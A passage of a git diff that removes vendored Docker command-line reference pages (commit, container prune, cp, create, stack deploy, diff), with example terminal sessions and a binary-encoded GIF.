-    197387f1b436        ubuntu:12.04        /bin/bash           7 days ago          Up 25 hours
-    $ docker commit c3f279d17e0a  svendowideit/testimage:version3
-    f5283438590d
-    $ docker images
-    REPOSITORY                        TAG                 ID                  CREATED             SIZE
-    svendowideit/testimage            version3            f5283438590d        16 seconds ago      335.7 MB
-
-## Commit a container with new configurations
-
-    {% raw %}
-    $ docker ps
-    ID                  IMAGE               COMMAND             CREATED             STATUS              PORTS
-    c3f279d17e0a        ubuntu:12.04        /bin/bash           7 days ago          Up 25 hours
-    197387f1b436        ubuntu:12.04        /bin/bash           7 days ago          Up 25 hours
-    $ docker inspect -f "{{ .Config.Env }}" c3f279d17e0a
-    [HOME=/ PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin]
-    $ docker commit --change "ENV DEBUG true" c3f279d17e0a  svendowideit/testimage:version3
-    f5283438590d
-    $ docker inspect -f "{{ .Config.Env }}" f5283438590d
-    [HOME=/ PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin DEBUG=true]
-    {% endraw %}
-
-## Commit a container with new `CMD` and `EXPOSE` instructions
-
-    $ docker ps
-    ID                  IMAGE               COMMAND             CREATED             STATUS              PORTS
-    c3f279d17e0a        ubuntu:12.04        /bin/bash           7 days ago          Up 25 hours
-    197387f1b436        ubuntu:12.04        /bin/bash           7 days ago          Up 25 hours
-
-    $ docker commit --change='CMD ["apachectl", "-DFOREGROUND"]' -c "EXPOSE 80" c3f279d17e0a  svendowideit/testimage:version4
-    f5283438590d
-
-    $ docker run -d svendowideit/testimage:version4
-    89373736e2e7f00bc149bd783073ac43d0507da250e999f3f1036e0db60817c0
-
-    $ docker ps
-    ID                  IMAGE               COMMAND                 CREATED             STATUS              PORTS
-    89373736e2e7        testimage:version4  "apachectl -DFOREGROU"  3 seconds ago       Up 2 seconds        80/tcp
-    c3f279d17e0a        ubuntu:12.04        /bin/bash               7 days ago          Up 25 hours
-    197387f1b436        ubuntu:12.04        /bin/bash               7 days ago          Up 25 hours
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/container_prune.md b/vendor/github.com/docker/docker/docs/reference/commandline/container_prune.md
deleted file mode 100644
index 43156406ec..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/container_prune.md
+++ /dev/null
@@ -1,47 +0,0 @@
----
-title: "container prune"
-description: "Remove all stopped containers"
-keywords: container, prune, delete, remove
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# container prune
-
-```markdown
-Usage:	docker container prune [OPTIONS]
-
-Remove all stopped containers
-
-Options:
-  -f, --force   Do not prompt for confirmation
-      --help    Print usage
-```
-
-## Examples
-
-```bash
-$ docker container prune
-WARNING! This will remove all stopped containers.
-Are you sure you want to continue? [y/N] y
-Deleted Containers:
-4a7f7eebae0f63178aff7eb0aa39cd3f0627a203ab2df258c1a00b456cf20063
-f98f9c2aa1eaf727e4ec9c0283bc7d4aa4762fbdba7f26191f26c97f64090360
-
-Total reclaimed space: 212 B
-```
-
-## Related information
-
-* [system df](system_df.md)
-* [volume prune](volume_prune.md)
-* [image prune](image_prune.md)
-* [network prune](network_prune.md)
-* [system prune](system_prune.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/cp.md b/vendor/github.com/docker/docker/docs/reference/commandline/cp.md
deleted file mode 100644
index fcfd35fce1..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/cp.md
+++ /dev/null
@@ -1,112 +0,0 @@
----
-title: "cp"
-description: "The cp command description and usage"
-keywords: "copy, container, files, folders"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# cp
-
-```markdown
-Usage:  docker cp [OPTIONS] CONTAINER:SRC_PATH DEST_PATH|-
-        docker cp [OPTIONS] SRC_PATH|- CONTAINER:DEST_PATH
-
-Copy files/folders between a container and the local filesystem
-
-Use '-' as the source to read a tar archive from stdin
-and extract it to a directory destination in a container.
-Use '-' as the destination to stream a tar archive of a
-container source to stdout.
-
-Options:
-  -L, --follow-link   Always follow symbol link in SRC_PATH
-      --help          Print usage
-```
-
-The `docker cp` utility copies the contents of `SRC_PATH` to the `DEST_PATH`.
-You can copy from the container's file system to the local machine or the
-reverse, from the local filesystem to the container. If `-` is specified for
-either the `SRC_PATH` or `DEST_PATH`, you can also stream a tar archive from
-`STDIN` or to `STDOUT`. The `CONTAINER` can be a running or stopped container.
-The `SRC_PATH` or `DEST_PATH` can be a file or directory.
-
-The `docker cp` command assumes container paths are relative to the container's
-`/` (root) directory. This means supplying the initial forward slash is optional;
-The command sees `compassionate_darwin:/tmp/foo/myfile.txt` and
-`compassionate_darwin:tmp/foo/myfile.txt` as identical. Local machine paths can
-be an absolute or relative value. The command interprets a local machine's
-relative paths as relative to the current working directory where `docker cp` is
-run.
-
-The `cp` command behaves like the Unix `cp -a` command in that directories are
-copied recursively with permissions preserved if possible. Ownership is set to
-the user and primary group at the destination. For example, files copied to a
-container are created with `UID:GID` of the root user. Files copied to the local
-machine are created with the `UID:GID` of the user which invoked the `docker cp`
-command.  If you specify the `-L` option, `docker cp` follows any symbolic link
-in the `SRC_PATH`.  `docker cp` does *not* create parent directories for
-`DEST_PATH` if they do not exist.
-
-Assuming a path separator of `/`, a first argument of `SRC_PATH` and second
-argument of `DEST_PATH`, the behavior is as follows:
-
-- `SRC_PATH` specifies a file
-    - `DEST_PATH` does not exist
-        - the file is saved to a file created at `DEST_PATH`
-    - `DEST_PATH` does not exist and ends with `/`
-        - Error condition: the destination directory must exist.
-    - `DEST_PATH` exists and is a file
-        - the destination is overwritten with the source file's contents
-    - `DEST_PATH` exists and is a directory
-        - the file is copied into this directory using the basename from
-          `SRC_PATH`
-- `SRC_PATH` specifies a directory
-    - `DEST_PATH` does not exist
-        - `DEST_PATH` is created as a directory and the *contents* of the source
-           directory are copied into this directory
-    - `DEST_PATH` exists and is a file
-        - Error condition: cannot copy a directory to a file
-    - `DEST_PATH` exists and is a directory
-        - `SRC_PATH` does not end with `/.`
-            - the source directory is copied into this directory
-        - `SRC_PATH` does end with `/.`
-            - the *content* of the source directory is copied into this
-              directory
-
-The command requires `SRC_PATH` and `DEST_PATH` to exist according to the above
-rules. If `SRC_PATH` is local and is a symbolic link, the symbolic link, not
-the target, is copied by default. To copy the link target and not the link, specify
-the `-L` option.
-
-A colon (`:`) is used as a delimiter between `CONTAINER` and its path. You can
-also use `:` when specifying paths to a `SRC_PATH` or `DEST_PATH` on a local
-machine, for example  `file:name.txt`. If you use a `:` in a local machine path,
-you must be explicit with a relative or absolute path, for example:
-
-    `/path/to/file:name.txt` or `./file:name.txt`
-
-It is not possible to copy certain system files such as resources under
-`/proc`, `/sys`, `/dev`, [tmpfs](run.md#mount-tmpfs-tmpfs), and mounts created by
-the user in the container. However, you can still copy such files by manually
-running `tar` in `docker exec`. For example (consider `SRC_PATH` and `DEST_PATH`
-are directories):
-
-    $ docker exec foo tar Ccf $(dirname SRC_PATH) - $(basename SRC_PATH) | tar Cxf DEST_PATH -
-
-or
-
-    $ tar Ccf $(dirname SRC_PATH) - $(basename SRC_PATH) | docker exec -i foo tar Cxf DEST_PATH -
-
-
-Using `-` as the `SRC_PATH` streams the contents of `STDIN` as a tar archive.
-The command extracts the content of the tar to the `DEST_PATH` in container's
-filesystem. In this case, `DEST_PATH` must specify a directory. Using `-` as
-the `DEST_PATH` streams the contents of the resource as a tar archive to `STDOUT`.
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/create.md b/vendor/github.com/docker/docker/docs/reference/commandline/create.md
deleted file mode 100644
index e6582e4a38..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/create.md
+++ /dev/null
@@ -1,211 +0,0 @@
----
-title: "create"
-description: "The create command description and usage"
-keywords: "docker, create, container"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# create
-
-Creates a new container.
-
-```markdown
-Usage:  docker create [OPTIONS] IMAGE [COMMAND] [ARG...]
-
-Create a new container
-
-Options:
-      --add-host value              Add a custom host-to-IP mapping (host:ip) (default [])
-  -a, --attach value                Attach to STDIN, STDOUT or STDERR (default [])
-      --blkio-weight value          Block IO (relative weight), between 10 and 1000
-      --blkio-weight-device value   Block IO weight (relative device weight) (default [])
-      --cap-add value               Add Linux capabilities (default [])
-      --cap-drop value              Drop Linux capabilities (default [])
-      --cgroup-parent string        Optional parent cgroup for the container
-      --cidfile string              Write the container ID to the file
-      --cpu-count int               The number of CPUs available for execution by the container.
-                                    Windows daemon only. On Windows Server containers, this is
-                                    approximated as a percentage of total CPU usage.
-      --cpu-percent int             CPU percent (Windows only)
-      --cpu-period int              Limit CPU CFS (Completely Fair Scheduler) period
-      --cpu-quota int               Limit CPU CFS (Completely Fair Scheduler) quota
-  -c, --cpu-shares int              CPU shares (relative weight)
-      --cpus NanoCPUs               Number of CPUs (default 0.000)
-      --cpu-rt-period int           Limit the CPU real-time period in microseconds
-      --cpu-rt-runtime int          Limit the CPU real-time runtime in microseconds
-      --cpuset-cpus string          CPUs in which to allow execution (0-3, 0,1)
-      --cpuset-mems string          MEMs in which to allow execution (0-3, 0,1)
-      --device value                Add a host device to the container (default [])
-      --device-read-bps value       Limit read rate (bytes per second) from a device (default [])
-      --device-read-iops value      Limit read rate (IO per second) from a device (default [])
-      --device-write-bps value      Limit write rate (bytes per second) to a device (default [])
-      --device-write-iops value     Limit write rate (IO per second) to a device (default [])
-      --disable-content-trust       Skip image verification (default true)
-      --dns value                   Set custom DNS servers (default [])
-      --dns-option value            Set DNS options (default [])
-      --dns-search value            Set custom DNS search domains (default [])
-      --entrypoint string           Overwrite the default ENTRYPOINT of the image
-  -e, --env value                   Set environment variables (default [])
-      --env-file value              Read in a file of environment variables (default [])
-      --expose value                Expose a port or a range of ports (default [])
-      --group-add value             Add additional groups to join (default [])
-      --health-cmd string           Command to run to check health
-      --health-interval duration    Time between running the check (ns|us|ms|s|m|h) (default 0s)
-      --health-retries int          Consecutive failures needed to report unhealthy
-      --health-timeout duration     Maximum time to allow one check to run (ns|us|ms|s|m|h) (default 0s)
-      --help                        Print usage
-  -h, --hostname string             Container host name
-      --init                        Run an init inside the container that forwards signals and reaps processes
-      --init-path string            Path to the docker-init binary
-  -i, --interactive                 Keep STDIN open even if not attached
-      --io-maxbandwidth string      Maximum IO bandwidth limit for the system drive (Windows only)
-      --io-maxiops uint             Maximum IOps limit for the system drive (Windows only)
-      --ip string                   Container IPv4 address (e.g. 172.30.100.104)
-      --ip6 string                  Container IPv6 address (e.g. 2001:db8::33)
-      --ipc string                  IPC namespace to use
-      --isolation string            Container isolation technology
-      --kernel-memory string        Kernel memory limit
-  -l, --label value                 Set meta data on a container (default [])
-      --label-file value            Read in a line delimited file of labels (default [])
-      --link value                  Add link to another container (default [])
-      --link-local-ip value         Container IPv4/IPv6 link-local addresses (default [])
-      --log-driver string           Logging driver for the container
-      --log-opt value               Log driver options (default [])
-      --mac-address string          Container MAC address (e.g. 92:d0:c6:0a:29:33)
-  -m, --memory string               Memory limit
-      --memory-reservation string   Memory soft limit
-      --memory-swap string          Swap limit equal to memory plus swap: '-1' to enable unlimited swap
-      --memory-swappiness int       Tune container memory swappiness (0 to 100) (default -1)
-      --name string                 Assign a name to the container
-      --network-alias value         Add network-scoped alias for the container (default [])
-      --network string              Connect a container to a network (default "default")
-                                    'bridge': create a network stack on the default Docker bridge
-                                    'none': no networking
-                                    'container:<name|id>': reuse another container's network stack
-                                    'host': use the Docker host network stack
-                                    '<network-name>|<network-id>': connect to a user-defined network
-      --no-healthcheck              Disable any container-specified HEALTHCHECK
-      --oom-kill-disable            Disable OOM Killer
-      --oom-score-adj int           Tune host's OOM preferences (-1000 to 1000)
-      --pid string                  PID namespace to use
-      --pids-limit int              Tune container pids limit (set -1 for unlimited), kernel >= 4.3
-      --privileged                  Give extended privileges to this container
-  -p, --publish value               Publish a container's port(s) to the host (default [])
-  -P, --publish-all                 Publish all exposed ports to random ports
-      --read-only                   Mount the container's root filesystem as read only
-      --restart string              Restart policy to apply when a container exits (default "no")
-                                    Possible values are: no, on-failure[:max-retry], always, unless-stopped
-      --rm                          Automatically remove the container when it exits
-      --runtime string              Runtime to use for this container
-      --security-opt value          Security Options (default [])
-      --shm-size string             Size of /dev/shm, default value is 64MB.
-                                    The format is `<number><unit>`. `number` must be greater than `0`.
-                                    Unit is optional and can be `b` (bytes), `k` (kilobytes), `m` (megabytes),
-                                    or `g` (gigabytes). If you omit the unit, the system uses bytes.
-      --stop-signal string          Signal to stop a container, SIGTERM by default (default "SIGTERM")
-      --stop-timeout=10             Timeout (in seconds) to stop a container
-      --storage-opt value           Storage driver options for the container (default [])
-      --sysctl value                Sysctl options (default map[])
-      --tmpfs value                 Mount a tmpfs directory (default [])
-  -t, --tty                         Allocate a pseudo-TTY
-      --ulimit value                Ulimit options (default [])
-  -u, --user string                 Username or UID (format: <name|uid>[:<group|gid>])
-      --userns string               User namespace to use
-                                    'host': Use the Docker host user namespace
-                                    '': Use the Docker daemon user namespace specified by `--userns-remap` option.
-      --uts string                  UTS namespace to use
-  -v, --volume value                Bind mount a volume (default []). The format
-                                    is `[host-src:]container-dest[:<options>]`.
-                                    The comma-delimited `options` are [rw|ro],
-                                    [z|Z], [[r]shared|[r]slave|[r]private], and
-                                    [nocopy]. The 'host-src' is an absolute path
-                                    or a name value.
-      --volume-driver string        Optional volume driver for the container
-      --volumes-from value          Mount volumes from the specified container(s) (default [])
-  -w, --workdir string              Working directory inside the container
-```
-
-The `docker create` command creates a writeable container layer over the
-specified image and prepares it for running the specified command.  The
-container ID is then printed to `STDOUT`.  This is similar to `docker run -d`
-except the container is never started.  You can then use the
-`docker start <container_id>` command to start the container at any point.
-
-This is useful when you want to set up a container configuration ahead of time
-so that it is ready to start when you need it. The initial status of the
-new container is `created`.
-
-Please see the [run command](run.md) section and the [Docker run reference](../run.md) for more details.
-
-## Examples
-
-    $ docker create -t -i fedora bash
-    6d8af538ec541dd581ebc2a24153a28329acb5268abe5ef868c1f1a261221752
-    $ docker start -a -i 6d8af538ec5
-    bash-4.2#
-
-As of v1.4.0 container volumes are initialized during the `docker create` phase
-(i.e., `docker run` too). For example, this allows you to `create` the `data`
-volume container, and then use it from another container:
-
-    $ docker create -v /data --name data ubuntu
-    240633dfbb98128fa77473d3d9018f6123b99c454b3251427ae190a7d951ad57
-    $ docker run --rm --volumes-from data ubuntu ls -la /data
-    total 8
-    drwxr-xr-x  2 root root 4096 Dec  5 04:10 .
-    drwxr-xr-x 48 root root 4096 Dec  5 04:11 ..
-
-Similarly, `create` a host directory bind mounted volume container, which can
-then be used from the subsequent container:
-
-    $ docker create -v /home/docker:/docker --name docker ubuntu
-    9aa88c08f319cd1e4515c3c46b0de7cc9aa75e878357b1e96f91e2c773029f03
-    $ docker run --rm --volumes-from docker ubuntu ls -la /docker
-    total 20
-    drwxr-sr-x  5 1000 staff  180 Dec  5 04:00 .
-    drwxr-xr-x 48 root root  4096 Dec  5 04:13 ..
-    -rw-rw-r--  1 1000 staff 3833 Dec  5 04:01 .ash_history
-    -rw-r--r--  1 1000 staff  446 Nov 28 11:51 .ashrc
-    -rw-r--r--  1 1000 staff   25 Dec  5 04:00 .gitconfig
-    drwxr-sr-x  3 1000 staff   60 Dec  1 03:28 .local
-    -rw-r--r--  1 1000 staff  920 Nov 28 11:51 .profile
-    drwx--S---  2 1000 staff  460 Dec  5 00:51 .ssh
-    drwxr-xr-x 32 1000 staff 1140 Dec  5 04:01 docker
-
-Set storage driver options per container.
-
-    $ docker create -it --storage-opt size=120G fedora /bin/bash
-
-This (size) will allow to set the container rootfs size to 120G at creation time.
-This option is only available for the `devicemapper`, `btrfs`, `overlay2`,
-`windowsfilter` and `zfs` graph drivers.
-For the `devicemapper`, `btrfs`, `windowsfilter` and `zfs` graph drivers,
-user cannot pass a size less than the Default BaseFS Size.
-For the `overlay2` storage driver, the size option is only available if the
-backing fs is `xfs` and mounted with the `pquota` mount option.
-Under these conditions, user can pass any size less then the backing fs size.
-
-### Specify isolation technology for container (--isolation)
-
-This option is useful in situations where you are running Docker containers on
-Windows. The `--isolation=<value>` option sets a container's isolation
-technology. On Linux, the only supported is the `default` option which uses
-Linux namespaces. On Microsoft Windows, you can specify these values:
-
-
-| Value     | Description                                                                                                                                                   |
-|-----------|---------------------------------------------------------------------------------------------------------------------------------------------------------------|
-| `default` | Use the value specified by the Docker daemon's `--exec-opt` . If the `daemon` does not specify an isolation technology, Microsoft Windows uses `process` as its default value if the
-daemon is running on Windows server, or `hyperv` if running on Windows client.  |
-| `process` | Namespace isolation only.                                                                                                                                     |
-| `hyperv`   | Hyper-V hypervisor partition-based isolation.                                                                                                                  |
-
-Specifying the `--isolation` flag without a value is the same as setting `--isolation="default"`.
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/deploy.md b/vendor/github.com/docker/docker/docs/reference/commandline/deploy.md
deleted file mode 100644
index 53074b2fd4..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/deploy.md
+++ /dev/null
@@ -1,101 +0,0 @@
----
-title: "deploy"
-description: "The deploy command description and usage"
-keywords: "stack, deploy"
-advisory: "experimental"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# deploy (alias for stack deploy) (experimental)
-
-```markdown
-Usage:  docker deploy [OPTIONS] STACK
-
-Deploy a new stack or update an existing stack
-
-Aliases:
-  deploy, up
-
-Options:
-      --bundle-file string    Path to a Distributed Application Bundle file
-      --compose-file string   Path to a Compose file
-      --help                  Print usage
-      --with-registry-auth    Send registry authentication details to Swarm agents
-```
-
-Create and update a stack from a `compose` or a `dab` file on the swarm. This command
-has to be run targeting a manager node.
-
-## Compose file
-
-The `deploy` command supports compose file version `3.0` and above.
-
-```bash
-$ docker stack deploy --compose-file docker-compose.yml vossibility
-Ignoring unsupported options: links
-
-Creating network vossibility_vossibility
-Creating network vossibility_default
-Creating service vossibility_nsqd
-Creating service vossibility_logstash
-Creating service vossibility_elasticsearch
-Creating service vossibility_kibana
-Creating service vossibility_ghollector
-Creating service vossibility_lookupd
-```
-
-You can verify that the services were correctly created
-
-```
-$ docker service ls
-ID            NAME                               MODE        REPLICAS  IMAGE
-29bv0vnlm903  vossibility_lookupd                replicated  1/1       nsqio/nsq@sha256:eeba05599f31eba418e96e71e0984c3dc96963ceb66924dd37a47bf7ce18a662
-4awt47624qwh  vossibility_nsqd                   replicated  1/1       nsqio/nsq@sha256:eeba05599f31eba418e96e71e0984c3dc96963ceb66924dd37a47bf7ce18a662
-4tjx9biia6fs  vossibility_elasticsearch          replicated  1/1       elasticsearch@sha256:12ac7c6af55d001f71800b83ba91a04f716e58d82e748fa6e5a7359eed2301aa
-7563uuzr9eys  vossibility_kibana                 replicated  1/1       kibana@sha256:6995a2d25709a62694a937b8a529ff36da92ebee74bafd7bf00e6caf6db2eb03
-9gc5m4met4he  vossibility_logstash               replicated  1/1       logstash@sha256:2dc8bddd1bb4a5a34e8ebaf73749f6413c101b2edef6617f2f7713926d2141fe
-axqh55ipl40h  vossibility_vossibility-collector  replicated  1/1       icecrime/vossibility-collector@sha256:f03f2977203ba6253988c18d04061c5ec7aab46bca9dfd89a9a1fa4500989fba
-```
-
-## DAB file
-
-```bash
-$ docker stack deploy --bundle-file vossibility-stack.dab vossibility
-Loading bundle from vossibility-stack.dab
-Creating service vossibility_elasticsearch
-Creating service vossibility_kibana
-Creating service vossibility_logstash
-Creating service vossibility_lookupd
-Creating service vossibility_nsqd
-Creating service vossibility_vossibility-collector
-```
-
-You can verify that the services were correctly created:
-
-```bash
-$ docker service ls
-ID            NAME                               MODE        REPLICAS  IMAGE
-29bv0vnlm903  vossibility_lookupd                replicated  1/1       nsqio/nsq@sha256:eeba05599f31eba418e96e71e0984c3dc96963ceb66924dd37a47bf7ce18a662
-4awt47624qwh  vossibility_nsqd                   replicated  1/1       nsqio/nsq@sha256:eeba05599f31eba418e96e71e0984c3dc96963ceb66924dd37a47bf7ce18a662
-4tjx9biia6fs  vossibility_elasticsearch          replicated  1/1       elasticsearch@sha256:12ac7c6af55d001f71800b83ba91a04f716e58d82e748fa6e5a7359eed2301aa
-7563uuzr9eys  vossibility_kibana                 replicated  1/1       kibana@sha256:6995a2d25709a62694a937b8a529ff36da92ebee74bafd7bf00e6caf6db2eb03
-9gc5m4met4he  vossibility_logstash               replicated  1/1       logstash@sha256:2dc8bddd1bb4a5a34e8ebaf73749f6413c101b2edef6617f2f7713926d2141fe
-axqh55ipl40h  vossibility_vossibility-collector  replicated  1/1       icecrime/vossibility-collector@sha256:f03f2977203ba6253988c18d04061c5ec7aab46bca9dfd89a9a1fa4500989fba
-```
-
-## Related information
-
-* [stack config](stack_config.md)
-* [stack deploy](stack_deploy.md)
-* [stack ls](stack_ls.md)
-* [stack ps](stack_ps.md)
-* [stack rm](stack_rm.md)
-* [stack services](stack_services.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/diff.md b/vendor/github.com/docker/docker/docs/reference/commandline/diff.md
deleted file mode 100644
index be27678dcd..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/diff.md
+++ /dev/null
@@ -1,48 +0,0 @@
----
-title: "diff"
-description: "The diff command description and usage"
-keywords: "list, changed, files, container"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# diff
-
-```markdown
-Usage:  docker diff CONTAINER
-
-Inspect changes on a container's filesystem
-
-Options:
-      --help   Print usage
-```
-
-List the changed files and directories in a container᾿s filesystem.
- There are 3 events that are listed in the `diff`:
-
-1. `A` - Add
-2. `D` - Delete
-3. `C` - Change
-
-For example:
-
-    $ docker diff 7bb0e258aefe
-
-    C /dev
-    A /dev/kmsg
-    C /etc
-    A /etc/mtab
-    A /go
-    A /go/src
-    A /go/src/github.com
-    A /go/src/github.com/docker
-    A /go/src/github.com/docker/docker
-    A /go/src/github.com/docker/docker/.git
-    ....
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/docker_images.gif b/vendor/github.com/docker/docker/docs/reference/commandline/docker_images.gif
deleted file mode 100644
index 5894ca270e002758b8f332141e00356e42868880..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 35785
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
